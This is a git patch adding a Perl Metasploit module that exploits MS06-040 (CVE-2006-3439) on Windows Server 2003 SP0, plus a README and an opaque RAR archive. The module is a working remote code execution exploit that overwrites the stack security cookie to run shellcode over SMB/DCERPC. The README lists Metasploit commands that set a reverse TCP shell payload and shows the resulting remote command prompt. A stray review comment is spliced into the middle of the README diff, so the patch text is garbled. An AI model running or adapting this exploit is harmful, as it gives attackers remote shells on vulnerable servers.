From 0a812140bfc36940629ed2b51176a3ebedc8f528 Mon Sep 17 00:00:00 2001
From: Gitmaninc
Date: Mon, 15 May 2017 19:40:58 -0400
Subject: [PATCH] MS06-040
---
 MS06-040/2355.pm | 233 +++++++++++++++++++++++++++++++++++++++++++
 MS06-040/README.md | 32 ++++++
 MS06-040/ms06040.rar | Bin 0 -> 15506 bytes
 3 files changed, 265 insertions(+)
 create mode 100644 MS06-040/2355.pm
 create mode 100644 MS06-040/README.md
 create mode 100644 MS06-040/ms06040.rar
diff --git a/MS06-040/2355.pm b/MS06-040/2355.pm
new file mode 100644
index 0000000..f86183e
--- /dev/null
+++ b/MS06-040/2355.pm
@@ -0,0 +1,233 @@
+#########################################################################
+# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)
+#
+# Author: Trirat Puttaraksa (Kira)
+#
+# http://sf-freedom.blogspot.com
+#
+# For educational purpose only
+#
+# Note: This exploit is developed because of my question "Is it exploitable
+# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows
+# Server 2003 SP1 is not exploitable because they are compiled with /GS, but
+# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there
+# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not
+# exploitable ? There is Stack Protection Windows Server 2003, is this the
+# reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ?
+#
+# I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him
+# ^-^) and work on it. The problem is the Stack Protection "security cookie
+# checking". Because wcscpy() method allow me to write to any memory location
+# that are marked writable, I decide to write to the location at "security
+# cookie" is stored and it works !!! I will describe more implementation details
+# in my blog in few days ^-^
+#
+# This exploit tested on Windows Server 2003 SP0 build 3790 and successful
+# exploit 2003 machine in my environment - all patch before MS06-040
+# (KB921883). It's quite reliable but not 100%. There is the possibility that
+# the exploit will fail and the target system process crash. Because I have
+# only one testbase system, I couldn't confirm this exploit will work on
+# your environment. However feel free to e-mail to me.
+#
+# Credits: H D Moore
+#########################################################################
+
+package Msf::Exploit::netapi_win2003;
+use base "Msf::Exploit";
+use strict;
+
+use Pex::DCERPC;
+use Pex::NDR;
+
+my $advanced = {
+ 'FragSize' => [ 256, 'The DCERPC fragment size' ],
+ 'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ],
+ 'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ],
+ };
+
+my $info = {
+ 'Name' => 'MSO6-040 Windows Server 2003 Target',
+ 'Version' => '',
+ 'Authors' =>
+ [
+ 'Trirat Puttaraksa (Kira) ',
+ ],
+
+ 'Arch' => ['x86'],
+ 'OS' => [ 'win32', 'win2003' ],
+ 'Priv' => 1,
+
+ 'AutoOpts' => { 'EXITFUNC' => 'thread' },
+
+ 'UserOpts' =>
+ {
+ 'RHOST' => [ 1, 'ADDR', 'The target address' ],
+
+ # SMB connection options
+ 'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
+ 'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
+ 'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
+ },
+
+ 'Payload' =>
+ {
+ # Technically we can use more space than this, but by limiting it
+ # to 370 bytes we can use the same request for all Windows SPs.
+ 'Space' => 370,
+
+ 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
+ 'Keys' => ['+ws2ord'],
+
+ # sub esp, 4097 + inc esp makes stack happy
+ 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
+ },
+
+ 'Description' => Pex::Text::Freeform(
+ qq{
+ This exploit modified from netapi_ms06_040.pm (Metasploit).
+ While netapi_ms06_040 of metasploit works on Windows 2000
+ SP0 - SP4 and Windows XP SP0 - SP1, this exploit works on
+ Windows Server 2003 SP0.
+ }
+ ),
+
+ 'Refs' =>
+ [
+ [ 'BID', '19409' ],
+ [ 'CVE', '2006-3439' ],
+ [ 'MSB', 'MS06-040' ],
+ ],
+
+ 'DefaultTarget' => 0,
+ 'Targets' =>
+ [
+ [ '(wcscpy) Windows Server 2003 SP0', 612],
+ ],
+
+ 'Keys' => ['srvsvc'],
+
+ 'DisclosureDate' => '',
+ };
+
+sub new {
+ my ($class) = @_;
+ my $self =
+ $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
+ return ($self);
+}
+
+sub Exploit {
+ my ($self) = @_;
+ my $target_host = $self->GetVar('RHOST');
+ my $target_port = $self->GetVar('RPORT');
+ my $target_idx = $self->GetVar('TARGET');
+ my $shellcode = $self->GetVar('EncodedPayload')->Payload;
+ my $target_name = '*SMBSERVER';
+
+ my $FragSize = $self->GetVar('FragSize') || 256;
+ my $target = $self->Targets->[$target_idx];
+
+ if (!$self->InitNops(128)) {
+ $self->PrintLine("Could not initialize the nop module");
+ return;
+ }
+
+ my ( $res, $rpc );
+
+ my $pipe = '\BROWSER';
+ my $uuid = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
+ my $version = '3.0';
+
+ my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );
+
+ my $dce = Pex::DCERPC->new(
+ 'handle' => $handle,
+ 'username' => $self->GetVar('SMBUSER'),
+ 'password' => $self->GetVar('SMBPASS'),
+ 'domain' => $self->GetVar('SMBDOM'),
+ 'fragsize' => $self->GetVar('FragSize'),
+ 'bindevasion' => $self->GetVar('BindEvasion'),
+ 'directsmb' => $self->GetVar('DirectSMB'),
+ );
+
+ if ( !$dce ) {
+ $self->PrintLine("[*] Could not bind to $handle");
+ return;
+ }
+
+ my $smb = $dce->{'_handles'}{$handle}{'connection'};
+
+ if (! $smb) {
+ $self->PrintLine("[*] Could not establish SMB session");
+ return;
+ }
+
+ my $stub;
+
+ #
+ # Use the wcscpy() method on Windows Server 2003 SP0
+ #
+ if ($target->[0] =~ /2003/) {
+
+ my $path =
+ $shellcode.
+
+ # Padding
+ Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
+ Pex::Text::AlphaNumText(32).
+ substr($shellcode, 0, 4). # cookie
+ Pex::Text::AlphaNumText(4).
+ # return address == address that store security cookie
+ ("\xec\xc1\xc8\x71") .
+ Pex::Text::AlphaNumText(8).
+
+ ("\xec\xc1\xc8\x71" x 2) .
+ Pex::Text::AlphaNumText(36).
+
+ # Terminate
+ "\x00\x00";
+
+
+ # Package that into a stub
+ $stub =
+ Pex::NDR::Long(int(rand(0xffffffff))).
+ Pex::NDR::UnicodeConformantVaryingString('').
+ Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
+ Pex::NDR::Long(int(rand(250)+1)).
+ Pex::NDR::UnicodeConformantVaryingString('').
+ Pex::NDR::Long(int(rand(250)+1)).
+ Pex::NDR::Long(0);
+ }
+ else {
+ $self->PrintLine("This target is not currently supported");
+ return;
+ }
+
+
+ $self->PrintLine("[*] Sending request...");
+
+ # Function 0x1f is not the only way to exploit this :-)
+ my @response = $dce->request( $handle, 0x1f, $stub );
+
+ if ( length($dce->{'response'}->{'StubData'}) > 0) {
+ $self->PrintLine("[*] The server rejected it, trying again...");
+ @response = $dce->request( $handle, 0x1f, $stub );
+ }
+
+ if ( length($dce->{'response'}->{'StubData'}) > 0) {
+ $self->PrintLine("[*] Exploit Failed");
+ }
+
+ if (@response) {
+ $self->PrintLine('[*] RPC server responded with:');
+ foreach my $line (@response) {
+ $self->PrintLine( '[*] ' . $line );
+ }
+ }
+
+ return;
+}
+
+1;
+
+# milw0rm.com [2006-09-13]
diff --git a/MS06-040/README.md b/MS06-040/README.md
new file mode 100644
index 0000000..1ad6346
--- /dev/null
+++ b/MS06-040/README.md
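Review bot: The `'Name'` entry in `$info` spells the bulletin as `MSO6-040` with a letter O, so anyone inventorying or grepping this repository for the bulletin ID will miss the module even though `'Refs'` has it right; it should read `'Name' => 'MS06-040 Windows Server 2003 Target',`. `'Version'` and `'DisclosureDate'` are left as empty strings, so the file carries no provenance to match it against the advisory and the fix the header names (KB921883). In `Exploit`, `$target_port`, `$target_name`, `$FragSize`, `$res` and `$rpc` are declared or assigned but never read, and `$smb` is only tested once. The file enables `use strict;` without `use warnings;`, so dropping the dead locals and adding `use warnings;` would make the module easier to audit.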
@@ -0,0 +1,32 @@
+# MS06-040
+
+MS06-040
+
+Vulnerability reference:
+ * [MS06-040](https://technet.microsoft.com/library/security/ms06-040)
+ * [CVE-2006-3439](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439)
+ * [exp-db](https://www.exploit-db.com/exploits/2355/)
+
+## msf Usage
+* [YouTube-ms06-040](https://www.youtube.com/watch?v=AsZ8qTr7IoE)
+```
+msf > search ms06_040
+msf > use exploit/windows/smb/ms06_040_netapi
+msf exploit(ms06_040_netapi) > show payloads
+msf exploit(ms06_040_netapi) > set payload windows/shell/reverse_tcp
+msf exploit(ms06_040_netapi) > set RHOST 192.1.80.2
+msf exploit(ms06_040_netapi) > set LHOST 192.1.80.152
+msf exploit(ms06_040_netapi) > set TARGET 0TARGET -> 0
+msf exploit(ms06_040_netapi) > exploit
+session -i 1
+
+Microsoft Windows 2000 [Version 5.00.2195]
+(C) 版权所有 1985-2000 Microsoft Corp.
+C:\WINNT\system32>
+```
+
+## References
+* [深入浅出MS06-040](http://blog.csdn.net/iiprogram/article/details/2820149)
+* [How to Exploit MS06-040](https://www.linickx.com/how-to-exploit-ms06-040)
+
+
diff --git a/MS06-040/ms06040.rar b/MS06-040/ms06040.rar new file mode 100644 index 0000000000000000000000000000000000000000..f7017c7466eabfdf51dcf9a508d69ff6ab54d566 GIT binary patch literal 15506 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 